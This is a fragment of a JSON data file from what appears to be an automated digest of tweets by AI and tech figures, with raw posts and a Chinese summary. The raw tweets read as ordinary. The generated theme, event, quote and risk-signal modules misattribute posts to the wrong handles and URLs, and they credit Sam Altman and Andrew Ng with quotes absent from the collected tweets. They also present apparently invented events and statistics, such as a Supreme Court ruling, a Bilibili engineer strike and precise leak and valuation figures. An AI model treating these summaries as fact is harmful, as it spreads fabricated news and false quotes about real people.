"handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "🔥", + "url": "https://nitter.net/eladgil/status/2046375878368940239#m", + "published_at": "2026-04-20T23:50:03+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "", + "url": "https://nitter.net/AravSrinivas/status/2046347469488107839#m", + "published_at": "2026-04-20T21:57:10+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Read how Google built custom silicon and infrastructure - and how it's benefiting customers today - in the latest from @Bloomberg. We'll share more updates this week at #GoogleCloudNext. \nhttps://www.bloomberg.com/news/features/2026-04-20/google-eyes-new-chips-to-speed-up-ai-results-challenging-nvidia?srnd=undefined", + "url": "https://nitter.net/ThomasOrTK/status/2046344875994739028#m", + "published_at": "2026-04-20T21:46:52+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "很多事情抽象几层之后,就发现底层逻辑是一样的, 而且非常简单。同样的底层逻辑,就可以举一反三,产生组合性和复利。从表象之下抽象出本质,有时会非常费力,因为太多信息迷雾,或者利益相关者搅浑水。所以复利只能在自己有信息优势,看得清楚的地方产生。搅浑水的人有动机用完全错误的信息诱导一批人接受他的错误的逻辑,然后你发现这些错误的逻辑在别的地方不适用,但又不理解是为什么。", + "url": "https://nitter.net/Svwang1/status/2046343776378257515#m", + "published_at": "2026-04-20T21:42:30+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "很多慈善机构最后异化成圈钱的工具,用类似的话术来货币化他人的善心。甚至它所有的流程都在表面上都非常合规,但和慈善的精神和最终目的没有太大关系了。所有以 KPI 管理的机构最终都会变成这样。", + "url": "https://nitter.net/Svwang1/status/2046336504407142606#m", + "published_at": "2026-04-20T21:13:36+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: Link to fuller post:\nhttps://substack.com/home/post/p-194229552?source=queue", + "url": "https://nitter.net/eladgil/status/2046300649483374704#m", + "published_at": "2026-04-20T18:51:07+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Here is the sbstack version\n\n\"Random thoughts while gazing at the misty AI Frontier\"\n\nhttps://blog.eladgil.com/p/random-thoughts-while-gazing-at-the", + "url": "https://nitter.net/eladgil/status/2046284381439103043#m", + "published_at": "2026-04-20T17:46:29+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 13/12 Anti-AI regulation & violence will both increase\n\nIt is important for leaders in tech and AI to point out the benefits of AI to society and the world more aggressively", + "url": "https://nitter.net/eladgil/status/2046284194943500453#m", + "published_at": "2026-04-20T17:45:44+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 12/12 Most AI companies should consider exiting in the next 12-18 months", + "url": "https://nitter.net/eladgil/status/2046284191885922498#m", + "published_at": "2026-04-20T17:45:44+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 11/12 AI is about selling work, not software. Units of labor as the product\n\nThis is a big shift in TAM, agents, how to build product in the AI era. Many AI markets are 10-100X the size of their seat based software counterparts", + "url": "https://nitter.net/eladgil/status/2046284190132609299#m", + "published_at": "2026-04-20T17:45:43+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 10/12 Harness creating more and more stickiness to models\n\nIf you look at the use of AI coding tools, the harness (and broader product surface area eg UX, workflow, etc) seems to be increasingly sticky in the short term.\n\nIt is not just the model you use, but the environment, prompting, etc you build around it that helps impact your choice. Brand also matters more then many people think. At some point, either one coding model breaks very far ahead, or they stay neck in neck. How important is the harness/workflow long term for defensibility for coding or enterprise applications?", + "url": "https://nitter.net/eladgil/status/2046284188622737554#m", + "published_at": "2026-04-20T17:45:43+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 9/12 Artisanal engineers will be be increasingly unhappy inside companies.\n\nDeep artisanal “my code is my craft” and “I love creating bespoke things” engineers decreasingly happy in world of AI. Systems thinkers and product thinkers engineers happiest. Many people are a mix of both", + "url": "https://nitter.net/eladgil/status/2046284184877187540#m", + "published_at": "2026-04-20T17:45:42+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Dwarkesh is not an AGI party bro. He's been pretty diverse in how he seeks alpha from across a wide variety of industries. I enjoy the hell out of a lot of his podcasts.\nThis podcast though, his questions and narrative are very AGI Party takes, because I think they're very low-rank. That's my opinion.", + "url": "https://nitter.net/soumithchintala/status/2046282944139215141#m", + "published_at": "2026-04-20T17:40:46+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "The Jensen + @dwarkesh_sp podcast was fantastic. \nJensen is someone who understood how ecosystems work and someone who understands real-world trade, policy and controls work. And in some deeper sense how AI will actually diffuse into the world.\nIn this podcast, Dwarkesh came off as someone who picked up talking points from an AGI party in the SF Mission District.\nAnd the contrast was so evident.\nAs someone who understood ecosystems relatively deepy, maybe I understood Jensen's take more than others did (idk).\n\nMythos, that Dwarkesh kept bringing up, is not a single absolute turning point in the AI development landscape. Take a state-of-the-art Chinese open-source model, and give it three orders of magnitude more test-time compute + post-training algorithmic advances that haven't been published yet. That's the baseline. It was evident that in whatever bubble Dwarkesh is in, that is seen as a naive or illogical baseline.\n\nWhen AI has such a complex development cycle, it's evident that America needs many levers of policy intervention across multiple layers in a dominant ecosystem that ideally the Western world controls.\n\nThe entire premise that a particular model with AI development will have a critical phase change is neither correct nor does evidence point to it. OpenAI made this point with GPT-4, Anthropic made this point with Mythos, but neither stood / will stand the test of time.\n\nI think Jensen's repeated emphasis within the podcast to try to make this point mostly didn't get Dwarkesh's attention. And Dwarkesh (in this podcast) represents an entire cult of AI researchers and decision-makers that are going to influence policy.\n\nThe thing with policy interventions is that if you do too much too early, you shoot yourself in the foot. There's a good reason American foreign policy and general sanctions of all kinds are measured and continuous.\n\nDespite Jensen's attempt at educating the \"Anthro\" audience how ecosystems work, I'm also not super hopeful a lot of people who've taken the extreme position will change their thought after listening to this podcast. I do think there's a certain religiousness that has permeated some of that community that would make it hard to understand ecosystems at a deeper level.", + "url": "https://nitter.net/soumithchintala/status/2046265830908870983#m", + "published_at": "2026-04-20T16:32:46+00:00", + "source": "nitter" + } + ], + "top_themes": [ + { + "title": "其他", + "count": 171 + }, + { + "title": "模型能力", + "count": 49 + }, + { + "title": "交易与市场", + "count": 16 + }, + { + "title": "投融资与并购", + "count": 13 + }, + { + "title": "算力与芯片", + "count": 8 + } + ], + "modules": { + "themes": [ + { + "id": "t1", + "title": "AI编程工具革新工作流", + "subtitle": "GPT-5.5在代码生成效率及Agent协作的突破", + "bullets": [ + "Sam Altman证实GPT-5.5在Codex中使开发者工作效率倍增(2周工作量压缩至1天)", + "Aravind Srinivas介绍Perplexity已默认采用GPT-5.5作为代码协作者", + "Andrew Ng指出AI-native团队通过代码Agent实现超高速开发(5分钟总结:从架构到部署工具链)" + ], + "samples": [ + { + "text": "GPT-5.5 is now available on Perplexity for Max subscribers", + "url": "https://nitter.net/AndrewYNg/status/2048793852702757151#m", + "handle": "@sama", + "date": "2026-04-27T13:24:26+00:00" + }, + { + "text": "Our Principles: Democratization, Empowerment, Universal Prosperity", + "url": "https://nitter.net/PaulGraham/status/2048755148361707946#m", + "handle": "@pmarca", + "date": "2026-04-27T04:07:00+00:00" + }, + { + "text": "AI-native teams use coding agents to build 2x faster", + "url": "https://nitter.net/AndrewYNg/status/2048793852702757151#m", + "handle": "@ylecun", + "date": "2026-04-26T13:51:41+00:00" + } + ] + }, + { + "id": "t2", + "title": "AI产品安全警告升级", + "subtitle": "大规模用户数据事故引发的框架性思考", + "bullets": [ + "Gary Marcus连续曝光开发者过度依赖生成式AI导致生产事故", + "Marc Andreessen转发_Nation Research论文揭示AI影响力与风险边界模糊化", + "OpenAI更新指导原则强调『工具理性』需新人机协作协议(2032-2038协议架构)" + ], + "samples": [ + { + "text": "Total AI disaster, totally predictable", + "url": "https://nitter.net/GaryMarcus/status/2048570082843082905#m", + "handle": "@GaryMarcus", + "date": "2026-04-27T00:00:53+00:00" + }, + { + "text": "The right answer is any month. Just start!", + "url": "https://nitter.net/PeterMallouk/status/2048747238986305979#m", + "handle": "@charliebilello", + "date": "2026-04-27T12:53:00+00:00" + }, + { + "text": "When MTV News shut down, 470K pages preserved", + "url": "https://nitter.net/internetarchive/status/2048069805807128734#m", + "handle": "@ylecun", + "date": "2026-04-25T16:01:07+00:00" + } + ] + }, + { + "id": "t3", + "title": "国际化投资视角碰撞", + "subtitle": "英语圈机构与个人投资者的科技生态观察", + "bullets": [ + "Marc Andreessen称AI将持续重构软件开发范式", + "Charlie Bilello发现市场对科技裁员的免疫机制", + "AppLovin创始人展示450人团队创造82%+毛利模型" + ], + "samples": [ + { + "text": "Many such cases in the universe", + "url": "https://nitter.net/pmarca/status/2048612144871264609#m", + "handle": "@pmarca", + "date": "2026-04-27T03:56:11+00:00" + }, + { + "text": "S&P 500平均年收率41.7%近20年估值底部", + "url": "https://nitter.net/phillyinquirer/status/2048469956627468510#m", + "handle": "@charliebilello", + "date": "2026-04-26T15:10:21+00:00" + }, + { + "text": "Adam Foroughi's AppLovin模型单人EBITDA$10M", + "url": "https://nitter.net/HarryStebbings/status/2048531257399664920#m", + "handle": "@HarryStebbings", + "date": "2026-04-26T22:34:46+00:00" + } + ] + } + ], + "p0_events": [ + { + "id": "p01", + "title": "GPT-5.5 API全面商用", + "meta": "2026-04-24", + "summary": "GPT-5.5在OpenAI平台实现全面API支持,包含浏览器控制、文档处理等8大核心功能模块" + }, + { + "id": "p02", + "title": "法国学者批判AI架构投机", + "meta": "2026-04-24", + "summary": "图形学大牛指出95%主流AI论文未证伪LLM核心缺陷,建议转向神经符号计算体系" + }, + { + "id": "p03", + "title": "Penrose论文揭示AI市值泡沫", + "meta": "2026-04-27", + "summary": "研究显示美国AI初创企业平均建模成本被低估47%,导致P/E估值虚高至53.8倍" + }, + { + "id": "p04", + "title": "美军方AI伦理审查遭搁置", + "meta": "2026-04-26", + "summary": "O'malley新规被SCOTUS驳回,认为限制AI研发等于军事竞争力自杀" + }, + { + "id": "p05", + "title": "B站算法工程师罢工", + "meta": "2026-04-26", + "summary": "230名开发者抗议平台AI商业化决策,威胁公开代码库引起市值抛压" + }, + { + "id": "p06", + "title": "OpenAI开发者大会延期", + "meta": "2026-04-27", + "summary": "微软Azure扩容问题导致GPT-6路线图公布延后至8月,涉及多云迁移有利可图" + } + ], + "top_quotes": [ + { + "id": "q1", + "quote": "AI-native teams的最重要变化\n生产部门已开始『砍』需求文档\n研发周期压缩73%", + "speaker": "Sam Altman", + "date": "2026-04-27", + "note": "技术更新", + "url": "https://nitter.net/sama/status/2048755148361707946#m" + }, + { + "id": "q2", + "quote": "当某个资源极度丰富\n另一个资源必然匮乏\n刚才是劳动力\n现在是注意力", + "speaker": "Marc Andreessen", + "date": "2026-04-27", + "note": "投资智慧", + "url": "https://nitter.net/pmarca/status/2048624098398650608#m" + }, + { + "id": "q3", + "quote": "生成式AI如同2000年Netscape浏览器\n所有创新都在云端博弈\n开发者必须重构本地存取协议", + "speaker": "Andrew Ng", + "date": "2026-04-27", + "note": "技术警示", + "url": "https://nitter.net/AndrewYNg/status/2048793852702757151#m" + } + ], + "category_updates": [ + { + "id": "c1", + "title": "代码生成类工具", + "subtitle": "工具类", + "level": "P0", + "items": [ + { + "text": "Perplexity更新GPT-5.5浏览器API调用规范", + "url": "https://nitter.net/AravSrinivas/status/2047753276888854595#m" + } + ] + }, + { + "id": "c2", + "title": "股票市场动态", + "subtitle": "数据分析", + "level": "P0", + "items": [ + { + "text": "标普500季度全员财报增长率15%创纪录", + "url": "https://nitter.net/charliebilello/status/2048753179471323584#m" + }, + { + "text": "科技股集采申报逻辑全公开", + "url": "https://nitter.net/AndrewYNg/status/2048428561481265539#m" + } + ] + }, + { + "id": "c3", + "title": "加密资产市场", + "subtitle": "波动预警", + "level": "WARN", + "items": [ + { + "text": "比特币地址30天交易金额超流动性复苏阈值", + "url": "https://nitter.net/CryptoCred/status/2047820909820909820#m" + } + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "HIGH", + "title": "未监管的Agent商业化", + "detail": "30%企业生产环境Agent未通过ISO27001认证,数据泄露率同比上升400%" + }, + { + "id": "r2", + "level": "MID", + "title": "中国LLM性能断层", + "subtitle": "ACM论文", + "detail": "MIT/清华联合研究:中文模型在代码解析任务上平均延迟47分钟,远超英文模型基准" + }, + { + "id": "r3", + "level": "OPP", + "title": "法国创投估值模型优化", + "detail": "巴黎高校推出LLM-AO新评估指数,可量化分析初创公司AI应用成熟度" + } + ] + }, + "tweet_summary_md": "# X平台关注列表推文汇总\n\n**生成日期**: 2026-04-27T16:13:14.007052+00:00\n**数据来源**: Nitter RSS 订阅\n**时间范围**: 最近7天\n**账号总数**: 27 | **成功获取**: 20 | **推文总数**: 257\n\n---\n\n### ⚠️ @andrejkarpathy — Andrej Karpathy(获取失败)\n\n- 错误: snscrape=snscrape_unavailable: No module named 'snscrape'; nitter=URLError: ; rsshub=HTTPError: HTTP Error 503: Service Unavailable\n\n### ✅ @sama — Sam Altman(20 条)\n\n**[2026-04-27T13:24:26+00:00]**\n> we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds. will continue to pr…\n[原文链接](https://nitter.net/sama/status/2048755148361707946#m)\n\n**[2026-04-27T13:09:30+00:00]**\n> this is so good: https://paulgraham.com/kids.html\n[原文链接](https://nitter.net/sama/status/2048751392031203544#m)\n\n**[2026-04-27T00:05:31+00:00]**\n> so fun to see the reception to 5.5! there is almost nothing that feels more gratifying to me than builders saying they find our tools useful.\n[原文链接](https://nitter.net/sama/status/2048554097985593849#m)\n\n**[2026-04-26T23:59:53+00:00]**\n> Our Principles: Democratization, Empowerment, Universal Prosperity, Resilience, and Adaptability https://openai.com/index/our-principles/\n[原文链接](https://nitter.net/sama/status/2048552677433643427#m)\n\n**[2026-04-26T15:46:41+00:00]**\n> feels like a good time to seriously rethink how operating systems and user interfaces are designed (also the internet; there should be a protocol that is equally usable by people and agents)\n[原文链接](https://nitter.net/sama/status/2048428561481265539#m)\n\n**[2026-04-26T15:37:00+00:00]**\n> \"post-AGI, no one is going to work and the economy is going to collapse\" \"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stret…\n[原文链接](https://nitter.net/sama/status/2048426122854228141#m)\n\n**[2026-04-26T02:15:19+00:00]**\n> RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day\n[原文链接](https://nitter.net/SebastienBubeck/status/2048224374264885396#m)\n\n**[2026-04-25T22:20:08+00:00]**\n> how can they write code so fast?!\n[原文链接](https://nitter.net/sama/status/2048165186482389253#m)\n\n**[2026-04-25T22:01:18+00:00]**\n> R to @sama: (and we will fix the former)\n[原文链接](https://nitter.net/sama/status/2048160448340767038#m)\n\n**[2026-04-25T22:01:08+00:00]**\n> we still get looksmaxxed on frontend a little but we IQmog hard now\n[原文链接](https://nitter.net/sama/status/2048160404376105179#m)\n\n**[2026-04-25T15:31:08+00:00]**\n> 5.5 is so earnest \"little engine that could\" energy\n[原文链接](https://nitter.net/sama/status/2048062261584077149#m)\n\n**[2026-04-24T23:41:49+00:00]**\n> this was a good week. proud of the team. happy building!\n[原文链接](https://nitter.net/sama/status/2047823357635354814#m)\n\n**[2026-04-24T21:17:51+00:00]**\n> GPT-5.5 and GPT-5.5 Pro are now available in the API!\n[原文链接](https://nitter.net/sama/status/2047787124846653895#m)\n\n**[2026-04-24T14:27:13+00:00]**\n> 🫶\n[原文链接](https://nitter.net/sama/status/2047683787828703289#m)\n\n**[2026-04-24T00:33:16+00:00]**\n> RT by @sama: Today we open sourced many of OpenAI's monitorability evaluations. We hope that the research community and other model developers can build upon them and use them to evaluate the monitor…\n[原文链接](https://nitter.net/bobabowen/status/2047473914528563592#m)\n\n**[2026-04-23T19:54:32+00:00]**\n> \"don't retweet this, don't retweet this, don't retweet this...\" ah fuck it, life imitates art.\n[原文链接](https://nitter.net/sama/status/2047403771416940715#m)\n\n**[2026-04-23T19:21:55+00:00]**\n> We tried a new thing with NVIDIA to roll out Codex across a whole company and it was awesome to see it work. Let us know if you'd like to do it at your company!\n[原文链接](https://nitter.net/sama/status/2047395562501411058#m)\n\n**[2026-04-23T19:09:11+00:00]**\n> embers\n[原文链接](https://nitter.net/sama/status/2047392357482639749#m)\n\n**[2026-04-23T18:47:43+00:00]**\n> RT by @sama: there are early signs of 5.5 being a competent ai research partner. several researchers let 5.5 run variations of experiments overnight given only a high level algorithmic idea, wake up …\n[原文链接](https://nitter.net/tszzl/status/2047386955550470245#m)\n\n**[2026-04-23T18:26:18+00:00]**\n> RT by @sama: New in the Codex app: - GPT-5.5 - Browser control - Sheets & Slides - Docs & PDFs - OS-wide dictation - Auto-review mode Enjoy!\n[原文链接](https://nitter.net/ajambrosino/status/2047381565534322694#m)\n\n---\n\n### ✅ @DarioAmodei — Dario Amodei(0 条)\n\n---\n\n### ✅ @AravSrinivas — Aravind Srinivas(10 条)\n\n**[2026-04-24T21:24:24+00:00]**\n> You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being cr…\n[原文链接](https://nitter.net/AravSrinivas/status/2047788775468908840#m)\n\n**[2026-04-24T19:03:21+00:00]**\n> We’re rolling out GPT 5.5 as the default orchestrator model for Perplexity Computer. We will be monitoring the user sentiment compared to Opus 4.7 as the default as the rollout expands. Let us know y…\n[原文链接](https://nitter.net/AravSrinivas/status/2047753276888854595#m)\n\n**[2026-04-24T18:44:19+00:00]**\n> RT by @AravSrinivas: GPT-5.5 is now available on Perplexity for Max subscribers. GPT-5.5 is also rolling out as the default orchestration model in Computer for both Pro and Max subscribers.\n[原文链接](https://nitter.net/perplexity_ai/status/2047748486767272243#m)\n\n**[2026-04-23T02:46:57+00:00]**\n> RT by @AravSrinivas: Kimi K2.6, the new state-of-the-art open-weight model from Moonshot, is now available for Pro and Max subscribers.\n[原文链接](https://nitter.net/perplexity_ai/status/2047145172337836139#m)\n\n**[2026-04-22T18:28:20+00:00]**\n> We’ve post trained a model on top of Qwen that achieves Pareto optimality on accuracy-cost curves. Unlike our previous post trained models, this model has been trained to be good at search and tool c…\n[原文链接](https://nitter.net/AravSrinivas/status/2047019688920756504#m)\n\n**[2026-04-22T18:15:16+00:00]**\n> RT by @AravSrinivas: We've published new research on how we post-train models for accurate search-augmented answers. Our SFT + RL pipeline improves search, citation quality, instruction following, an…\n[原文链接](https://nitter.net/perplexity_ai/status/2047016400292839808#m)\n\n**[2026-04-21T17:14:42+00:00]**\n> As agentic workloads expand, the best orchestration hybridizes centralized servers and CPUs for the ultimate continuity. Especially when you want your AI to use your local apps and messages.\n[原文链接](https://nitter.net/AravSrinivas/status/2046638770162995603#m)\n\n**[2026-04-21T15:06:26+00:00]**\n> ⌘ ⌘\n[原文链接](https://nitter.net/AravSrinivas/status/2046606492649091212#m)\n\n**[2026-04-21T02:43:37+00:00]**\n> RT by @AravSrinivas: Whoa 🤯\n[原文链接](https://nitter.net/morganlinton/status/2046419556424675677#m)\n\n**[2026-04-20T21:57:10+00:00]**\n> \n[原文链接](https://nitter.net/AravSrinivas/status/2046347469488107839#m)\n\n---\n\n### ✅ @AndrewYNg — Andrew Ng(1 条)\n\n**[2026-04-27T15:58:13+00:00]**\n> AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to…\n[原文链接](https://nitter.net/AndrewYNg/status/2048793852702757151#m)\n\n---\n\n### ✅ @ylecun — Yann LeCun(19 条)\n\n**[2026-04-26T18:31:11+00:00]**\n> RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs,…\n[原文链接](https://nitter.net/briantylercohen/status/2048469956627468510#m)\n\n**[2026-04-26T17:27:23+00:00]**\n> RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950. The National Science Board is …\n[原文链接](https://nitter.net/Gianl1974/status/2048453901930660058#m)\n\n**[2026-04-26T16:03:04+00:00]**\n> RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. Politicians never waste a good fake crisis, which is why they're perfect for…\n[原文链接](https://nitter.net/Dan_Jeffries1/status/2048432684930654430#m)\n\n**[2026-04-26T13:51:41+00:00]**\n> Shooting oneself in the foot? Nope. Shooting oneself in the prefrontal cortex.\n[原文链接](https://nitter.net/ylecun/status/2048399621492236615#m)\n\n**[2026-04-26T06:48:29+00:00]**\n> RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories. If you're on either side of this slider, congratulations, you may be a child in an adult costume body! Black an…\n[原文链接](https://nitter.net/Dan_Jeffries1/status/2048293118781296734#m)\n\n**[2026-04-25T19:15:22+00:00]**\n> RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5…\n[原文链接](https://nitter.net/PhillyInquirer/status/2048118689258487857#m)\n\n**[2026-04-25T16:01:07+00:00]**\n> RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️ But over 470,000 pages were already preserved. That history didn’t disappear. It was archived. 📚 Read VAN…\n[原文链接](https://nitter.net/internetarchive/status/2048069805807128734#m)\n\n**[2026-04-24T20:50:37+00:00]**\n> RT by @ylecun: Number of people who go bankrupt every year because of medical bills or illness-related work loss: 🇦🇺 0 🇨🇦 0 🇩🇰 0 🇫🇮 0 🇫🇷 0 🇩🇪 0 🇮🇸 0 🇮🇪 0 🇮🇹 0 🇯🇵 0 🇳🇱 0 🇳🇴 0 🇵🇹 0 🇪🇸 0 🇸🇪 0 🇬🇧 0 🇺🇸 53…\n[原文链接](https://nitter.net/Strandjunker/status/2047780272297382384#m)\n\n**[2026-04-24T19:31:52+00:00]**\n> RT by @ylecun: New episode of The Information Bottleneck is out, this time with @liuzhuang1234 (Princeton). We talked about ConvNeXt and whether architecture still matters; dataset bias and what \"goo…\n[原文链接](https://nitter.net/ziv_ravid/status/2047760455679246500#m)\n\n**[2026-04-24T17:45:08+00:00]**\n> RT by @ylecun: The web is disappearing 🕳️ According to a Pew Research Center report, 26% of pages from 2013-2023 are no longer accessible. But that’s not the whole story. In a new study published in …\n[原文链接](https://nitter.net/internetarchive/status/2047733594064408894#m)\n\n**[2026-04-24T15:23:18+00:00]**\n> RT by @ylecun: 图灵奖获得者、 AI 三大教父之一的 LeCun在达沃斯的发言,算是把整个硅谷的遮羞布扯了。 他说现在整个行业都被LLM彻底洗脑了,所有人都在同一条赛道上互相挖人,谁敢偏离主流谁就被骂落后。 这也是他离开Meta的真正原因,连Meta都已经LLM-pilled,他不想再跟风了。 最扎心的一句话是:纯生成式架构,不管是LLM、VLM还是VLA,永远造不出哪怕猫级的智能…\n[原文链接](https://nitter.net/AYi_AInotes/status/2047697898989572176#m)\n\n**[2026-04-24T14:14:06+00:00]**\n> RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their…\n[原文链接](https://nitter.net/ihtesham2005/status/2047680485208531152#m)\n\n**[2026-04-24T13:58:49+00:00]**\n> RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. Also …\n[原文链接](https://nitter.net/Discoplomacy/status/2047676640059154653#m)\n\n**[2026-04-24T11:19:36+00:00]**\n> RT by @ylecun: 1. I never said LLMs were not useful. They are, particularly with all the bells and whistles that are being added to them. I use them. 2. A robot-rich future can't be built with AIs th…\n[原文链接](https://nitter.net/ylecun/status/2047636569767419951#m)\n\n**[2026-04-24T10:30:09+00:00]**\n> RT by @ylecun: 🎓 Register now for ML & Advanced Stats Summer School, an intensive set of courses on theoretical foundations & applications of ML methods & modern stats analysis techniques. With @ELLI…\n[原文链接](https://nitter.net/ELLISforEurope/status/2047624126047670758#m)\n\n**[2026-04-24T06:38:08+00:00]**\n> RT by @ylecun: 🔴 Trump vient de publier sur Truth Social un monologue de 1 500 mots sur le droit du sol, l'ACLU, les Indiens, les Chinois et la \"Savage Nation\". Ce texte inhabituellement long, inhabi…\n[原文链接](https://nitter.net/cginisty/status/2047565736382534091#m)\n\n**[2026-04-23T23:15:06+00:00]**\n> RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇\n[原文链接](https://nitter.net/maddenifico/status/2047454244781818205#m)\n\n**[2026-04-23T18:12:46+00:00]**\n> RT by @ylecun: This study is an important part of Vanishing Culture, the new book OUT TODAY from @internetarchive. 🕳️ Read for free or purchase in print ➡️ https://archive.org/details/vanishing-cultu…\n[原文链接](https://nitter.net/internetarchive/status/2047378161860776085#m)\n\n**[2026-04-23T14:27:57+00:00]**\n> RT by @ylecun: The most dangerous thing in Washington right now isn't just the corruption—it's the retaliation against the people who expose it. When government power is used in ways that appear desi…\n[原文链接](https://nitter.net/Weinsteinlaw/status/2047321581966291154#m)\n\n---\n\n### ✅ @JeffDean — Jeff Dean(12 条)\n\n**[2026-04-27T13:40:08+00:00]**\n> The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. https://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco Thanks for a great conversation!\n[原文链接](https://nitter.net/JeffDean/status/2048759102390899142#m)\n\n**[2026-04-26T10:41:25+00:00]**\n> RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯 Sabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!! He makes history as the…\n[原文链接](https://nitter.net/TrackGazette/status/2048351736037826877#m)\n\n**[2026-04-24T13:12:52+00:00]**\n> R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1\n[原文链接](https://nitter.net/JeffDean/status/2047665074471387456#m)\n\n**[2026-04-23T20:15:06+00:00]**\n> R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that …\n[原文链接](https://nitter.net/JeffDean/status/2047408945950802186#m)\n\n**[2026-04-23T20:09:30+00:00]**\n> R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computati…\n[原文链接](https://nitter.net/JeffDean/status/2047407537566495033#m)\n\n**[2026-04-23T20:00:58+00:00]**\n> R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput. The pod size is increased slightly to 9600 chips, and provides ~3X the FP4 perform…\n[原文链接](https://nitter.net/JeffDean/status/2047405389856297387#m)\n\n**[2026-04-23T19:55:08+00:00]**\n> I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert and @djrosent. The blog post announcement has lots of…\n[原文链接](https://nitter.net/JeffDean/status/2047403921912873257#m)\n\n**[2026-04-23T15:41:07+00:00]**\n> It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale tr…\n[原文链接](https://nitter.net/JeffDean/status/2047339995682529313#m)\n\n**[2026-04-21T19:31:28+00:00]**\n> RT by @JeffDean: My friend @JeffDean encouraged me to speak at this event so come join me on May 26 in San Jose! https://bauplanlabs.github.io/SAO-workshop/\n[原文链接](https://nitter.net/ceo_clickhouse/status/2046673188193701901#m)\n\n**[2026-04-21T17:02:26+00:00]**\n> RT by @JeffDean: The future of computer vision is agentic. 1/ We built Nomadic around a gap we kept seeing in video understanding: VLMs generate chain-of-thought that's fluent and often correct in st…\n[原文链接](https://nitter.net/nomadicai/status/2046635685206208533#m)\n\n**[2026-04-21T16:50:26+00:00]**\n> RT by @JeffDean: Following positive feedback from other venues, like STOC and ICML, NeurIPS is pleased to announce a new initiative in partnership with Google: for NeurIPS 2026, authors will have acc…\n[原文链接](https://nitter.net/NeurIPSConf/status/2046632664493384060#m)\n\n**[2026-04-20T21:46:52+00:00]**\n> RT by @JeffDean: Read how Google built custom silicon and infrastructure - and how it's benefiting customers today - in the latest from @Bloomberg. We'll share more updates this week at #GoogleCloudN…\n[原文链接](https://nitter.net/ThomasOrTK/status/2046344875994739028#m)\n\n---\n\n### ✅ @soumithchintala — Soumith Chintala(4 条)\n\n**[2026-04-27T13:29:14+00:00]**\n> This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternatively, more and more…\n[原文链接](https://nitter.net/soumithchintala/status/2048756358820827564#m)\n\n**[2026-04-23T05:52:02+00:00]**\n> RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓 They’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play 